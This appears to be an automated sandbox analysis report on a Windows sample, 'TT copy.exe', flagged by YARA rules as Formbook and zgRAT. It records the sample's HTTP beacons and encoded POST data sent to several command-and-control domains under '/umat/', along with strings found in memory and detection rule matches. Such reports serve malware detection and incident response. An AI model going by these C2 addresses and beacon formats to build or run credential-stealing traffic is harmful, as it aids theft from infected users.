43 4a 66 6d 56 39 52 48 35 32 7e 6f 39 55 44 59 4b 53 63 4c 38 6a 55 58 4a 69 78 4b 6d 6c 42 2d 34 5f 28 54 39 54 62 58 70 77 69 56 62 31 6f 41 53 4b 53 4d 63 71 6f 64 6f 45 39 4c 62 30 37 76 68 74 79 69 55 68 74 5a 4c 78 68 49 74 62 63 4b 72 66 5a 78 4a 51 54 5a 39 6b 41 6f 69 6e 76 77 6d 7a 4c 4b 73 76 56 78 5a 59 67 4d 73 36 56 69 52 54 55 48 36 76 6e 4a 62 62 44 6f 53 54 4e 42 53 6b 62 33 72 79 65 34 56 41 50 38 50 46 56 4f 53 6e 45 36 45 50 65 50 7e 44 73 79 39 47 6c 39 62 4d 31 73 77 46 6b 46 7e 5f 74 67 39 59 45 61 79 6b 46 64 43 58 65 42 4d 30 55 65 4a 71 66 50 65 78 4f 45 4c 55 61 53 33 69 28 30 76 36 45 41 52 58 7a 41 4c 6e 67 56 45 70 56 35 61 35 33 38 4b 47 76 30 72 77 5a 65 34 4f 33 79 35 5a 38 72 4e 33 4b 59 77 4b 43 52 56 39 7e 53 6a 71 39 5f 49 72 6c 47 79 55 39 5f 58 6b 49 77 44 4a 76 43 42 36 49 47 31 6e 53 66 64 35 58 37 50 46 59 49 35 70 77 34 74 42 4b 76 35 72 4f 35 53 38 4d 46 36 70 57 6b 48 50 68 68 38 70 37 55 64 6b 61 74 7e 34 57 44 33 51 32 77 67 30 7a 39 35 59 7e 4b 51 49 69 2d 35 42 6e 65 38
            Source: global traffic
            HTTP traffic detected: POST /umat/ HTTP/1.1
            Host: www.408wmountain.info
            Connection: close
            Content-Length: 414
            Cache-Control: no-cache
            Origin: http://www.408wmountain.info
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.408wmountain.info/umat/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Source: global traffic
            HTTP traffic detected: POST /umat/ HTTP/1.1
            Host: www.408wmountain.info
            Connection: close
            Content-Length: 36482
            Cache-Control: no-cache
            Origin: http://www.408wmountain.info
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.408wmountain.info/umat/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Source: global traffic
            HTTP traffic detected: POST /umat/ HTTP/1.1
            Host: www.huiyi-sui.com
            Connection: close
            Content-Length: 414
            Cache-Control: no-cache
            Origin: http://www.huiyi-sui.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.huiyi-sui.com/umat/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Source: global traffic
            HTTP traffic detected: POST /umat/ HTTP/1.1
            Host: www.huiyi-sui.com
            Connection: close
            Content-Length: 36482
            Cache-Control: no-cache
            Origin: http://www.huiyi-sui.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.huiyi-sui.com/umat/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Source: global traffic
            HTTP traffic detected: POST /umat/ HTTP/1.1
            Host: www.sarrafguler.com
            Connection: close
            Content-Length: 414
            Cache-Control: no-cache
            Origin: http://www.sarrafguler.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.sarrafguler.com/umat/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Source: global traffic
            HTTP traffic detected: POST /umat/ HTTP/1.1
            Host: www.sarrafguler.com
            Connection: close
            Content-Length: 36482
            Cache-Control: no-cache
            Origin: http://www.sarrafguler.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.sarrafguler.com/umat/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Source: global traffic
            HTTP traffic detected: POST /umat/ HTTP/1.1
            Host: www.theflysnare.com
            Connection: close
            Content-Length: 414
            Cache-Control: no-cache
            Origin: http://www.theflysnare.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.theflysnare.com/umat/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Source: global traffic
            HTTP traffic detected: POST /umat/ HTTP/1.1
            Host: www.theflysnare.com
            Connection: close
            Content-Length: 36482
            Cache-Control: no-cache
            Origin: http://www.theflysnare.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.theflysnare.com/umat/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Source: global traffic
            HTTP traffic detected: POST /umat/ HTTP/1.1
            Host: www.huayugw.com
            Connection: close
            Content-Length: 414
            Cache-Control: no-cache
            Origin: http://www.huayugw.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.huayugw.com/umat/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Source: global traffic
            HTTP traffic detected: POST /umat/ HTTP/1.1
            Host: www.huayugw.com
            Connection: close
            Content-Length: 36482
            Cache-Control: no-cache
            Origin: http://www.huayugw.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.huayugw.com/umat/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Content-Type: text/html
            Server: Microsoft-IIS/10.0
            X-Powered-By: ASP.NET
            Date: Fri, 03 Jun 2022 06:16:59 GMT
            Connection: close
            Content-Length: 1259
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 03 Jun 2022 06:17:09 GMT
            Server: Apache/2.4.29 (Ubuntu)
            Content-Length: 281
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.shopcycles3.com Port 80</address></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 403 Forbidden
            Server: nginx
            Date: Fri, 03 Jun 2022 06:17:26 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            D-Geo: EU
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 403 Forbidden
            Server: nginx
            Date: Fri, 03 Jun 2022 06:17:26 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            D-Geo: EU
            Content-Encoding: gzip
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 403 Forbidden
            Server: nginx
            Date: Fri, 03 Jun 2022 06:17:26 GMT
            Content-Type: text/html
            Content-Length: 174
            Connection: close
            D-Geo: EU
            Data Ascii: <html><head><title>Not supported</title></head><body><center><h1>Your browser version is no longer supported. Please upgrade to the latest version</h1></center></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Fri, 03 Jun 2022 06:17:37 GMT
            Content-Type: text/html
            Content-Length: 867
            Connection: close
            Server: Apache/2
            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
            Accept-Ranges: bytes
            Age: 0
            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Fri, 03 Jun 2022 06:19:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 228 X-Sorting-Hat-ShopId: 64312672485 X-Dc: gcp-europe-west1 X-Request-ID: 7cd6fc28-a7e1-4039-9e7f-7134e5189789 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 715650fedfd39bfb-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
            Source: TT copy.exe, 00000000.00000002.287711390.0000000001090000.00000004.00000020.00020000.00000000.sdmp, TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
            Source: TT copy.exe, 00000000.00000002.287711390.0000000001090000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comaM
            Source: TT copy.exe, 00000000.00000002.287711390.0000000001090000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comionmz
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
            Source: rundll32.exe, 0000000F.00000002.776637498.0000000005EAB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.huayugw.com
            Source: rundll32.exe, 0000000F.00000002.776637498.0000000005EAB000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.huayugw.com/umat/
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sassafrasriver.info/umat/
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sassafrasriver.info/umat/(
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sassafrasriver.info/umat/0
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sassafrasriver.info/umat/9
            Source: rundll32.exe, 0000000F.00000002.775195320.00000000034E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sassafrasriver.info/umat/:
            Source: rundll32.exe, 0000000F.00000002.775145614.00000000034BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.775060097.0000000003460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sassafrasriver.info/umat/?bT7tPLpx=YjKReNU7fpMtyeRGaGRV8DawgxIzw/dI3fdHDlQJdSAE6vSrucr3Ac
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sassafrasriver.info/umat/L
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sassafrasriver.info/umat/em32
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sassafrasriver.info/umat/om/
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
            Source: TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goo
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?g
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/setpc=s&uxe=4421591
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1;
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/calloutprid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/gws_rd=sslh5-
            Source: rundll32.exe, 0000000F.00000002.775080171.000000000346A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/l
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowse
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchpJ
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kt
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
            Source: rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQF
            Source: unknown HTTP traffic detected: POST /umat/ HTTP/1.1 Host: www.drivetrianrepair.com Connection: close Content-Length: 414 Cache-Control: no-cache Origin: http://www.drivetrianrepair.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.drivetrianrepair.com/umat/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Ascii:
bT7tPLpx=pgf8CKj6uNLCxEIwm37bENVXY5ziyKXOU71E16vjnnYIoxgD(ij0R1W8VzLt3MRFtDI-TvCyLZ2dNBKyiN(18_S1F1PXSi~ArXnORHB4T-mqDo3i4FMKSD94lPTqpTMzKypA01ps9tVCB-CtCVtlxyHKcykc1Y7cW6F5536uB7Ea3klwwSf8GFuuOfCwxAEaswbPoSIi9SUVJBt6~16701LSqMSNMWmGnkvZ4DeY8f1cO8aDbCN7ZSNSxaAfIfIx6CVw0trvfKn6shY5EoitupAbJx5gpdEEsDsEyNUGB5KmKgHMkm~oprqY9JW6ivlE5SPFhvGT1IFSVHQhfc5rRLdYUryRczWYA2nYK7UCKM7DEbUxW6TqP_(7AAsFFm~SuU9_dmbLrbbnHgMN2Q).
            Source: unknown DNS traffic detected: queries for: www.sinsegae.net
            Source: global traffic HTTP traffic detected: GET /umat/?bT7tPLpx=D4TTb2HFoQH2akGSEaIGW9Q5orhATJxj88Hz932hPvAyMJtUsfmLZeVWMqqycYkj367i&Lls=Mzrp HTTP/1.1 Host: www.sinsegae.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /umat/?bT7tPLpx=fN7N1F2KWXt3ovU6r68cyY5Lu6wYlX1654ZBQHzs5x7zh69UEoWjTQ+z2V8zkyyJbLkO&Lls=Mzrp HTTP/1.1 Host: www.shopcycles3.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /umat/?bT7tPLpx=mirGcuiLmtPKrDRAwzy9R4FSSMfuwOXiEO9Msa/shEoIjA842HTgawjSFBDstolWxD5R&Lls=Mzrp HTTP/1.1 Host: www.drivetrianrepair.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /umat/?bT7tPLpx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2Ti+o1fqk+Bj&Lls=Mzrp HTTP/1.1 Host: www.408wmountain.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /umat/?bT7tPLpx=0U+wDcNGQqR9Hew/M/CPYn8/YjXw+pI3fQmmix2gP7IpZmdQ6xwgfERw2ruDncdGOHrq&Lls=Mzrp HTTP/1.1 Host: www.huiyi-sui.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /umat/?bT7tPLpx=FnqEmG0l+4J7qDB1yrHJ8vmLGr/EIrLpN16t5uGcZtfyOUhwcz0qzKS8JKDk7Sjhqw7U&Lls=Mzrp HTTP/1.1 Host: www.sarrafguler.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /umat/?bT7tPLpx=KCFtk2ByPIrj6EQbanamrSzf2WMHsV3o1++x6ahF6LksDSy9FlqjvwWpWYTFvIM6F0DF&Lls=Mzrp HTTP/1.1 Host: www.theflysnare.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic HTTP traffic detected: GET /umat/?bT7tPLpx=2PPXS0ByghwnUiXofzfHcTluxn0kF7CQXUmv2gLgzHNDwPHvxa5MhM39jfYs7JtQ10qs&Lls=Mzrp HTTP/1.1 Host: www.huayugw.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud

            Source: Yara match File source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.TT copy.exe.7160000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
            Source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.TT copy.exe.7160000.9.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
            Source: 0.2.TT copy.exe.3ae0848.5.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
            Source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.TT copy.exe.3ae0848.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
